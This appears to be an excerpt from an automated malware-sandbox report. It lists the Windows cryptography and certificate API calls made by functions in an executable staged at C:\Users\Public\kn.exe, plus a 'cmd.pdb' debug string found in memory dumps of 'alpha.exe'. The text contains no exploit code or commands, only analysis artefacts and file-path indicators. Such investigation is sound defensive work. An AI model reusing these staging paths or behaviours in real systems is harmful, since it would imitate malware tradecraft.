Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF6C54C92D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF6C54D3188
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF6C5527178
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54C51A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF6C54DF168
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C54D5164
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5549208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF6C5549208
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF6C5527214
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF6C54F11C8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F31C0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55271C8 BCryptDestroyKey,#360,6_2_00007FF6C55271C8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF6C551F4A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF6C54DF488
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F9480
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF6C550B464
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5455438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6C5455438
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF6C54B3504
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F34F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF6C550B4EC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55214F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6C55214F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F3390
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF6C552739C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C55293A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55033B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF6C55033B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF6C54D33A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54AB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF6C54AB350
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C54B5338
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5487340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF6C5487340
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF6C547B36C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C552141C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F342C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6C54B13F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D53E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6C54D53E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6C54DB3D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6C54DDEB0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54ADEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6C54ADEA4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6C551DE70
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF6C5555E3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF6C54A7F14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555F20 CryptDecodeObjectEx,6_2_00007FF6C5555F20
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF6C54E5F04
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF6C5527EE8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54ADD80 CertFindExtension,CryptDecodeObject,6_2_00007FF6C54ADD80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5505D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF6C5505D80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5485DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C5485DA1
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5555D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF6C5555D74
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54B1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54B1D70
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C552BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF6C552BD3C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5527D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF6C5527D3C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54A9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54A9D6C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54D3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF6C54D3D60
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5485DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF6C5485DF7
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54E1E2C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5461DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF6C5461DE8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54C4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF6C54C4070
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C551E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF6C551E044
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54860DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C54860DA
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54F9F90
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54F5FA8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54C5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF6C54C5F54
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C548FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF6C548FF64
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5555FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6C5555FF0
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5485FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C5485FE8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5555AA8 CryptDecodeObjectEx,6_2_00007FF6C5555AA8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C551FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF6C551FA84
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5509A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF6C5509A58
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F1A44
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5483A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5483A40
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F7A70
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C550BA50 CryptSignCertificate,SetLastError,6_2_00007FF6C550BA50
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54B3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF6C54B3B14
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6C54E9AF8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5487988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF6C5487988
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54D597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6C54D597C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C554B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF6C554B980
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DB950 I_CryptGetLruEntryData,#357,6_2_00007FF6C54DB950
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54AF944 CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54AF944
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5519970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF6C5519970
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C552BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF6C552BA14
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF6C54DB9CC
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C547F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6C547F9B8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF6C54E1C84
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5491C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF6C5491C50
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54A3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C54A3C60
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5555C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6C5555C54
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C550DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF6C550DD1C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C551FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF6C551FD2C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF6C54E5CE8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C547BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF6C547BB80
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5455BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C5455BA4
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5555B90 CryptDecodeObjectEx,memmove,6_2_00007FF6C5555B90
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C551FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF6C551FB94
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54FFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF6C54FFB50
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5527B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF6C5527B60
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54BBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54BBB38
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5525B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF6C5525B44
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C552BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF6C552BB50
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54AFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54AFC34
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C548FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6C548FC20
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5479BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF6C5479BC8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54FBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54FBBC0
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F3BEB
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, 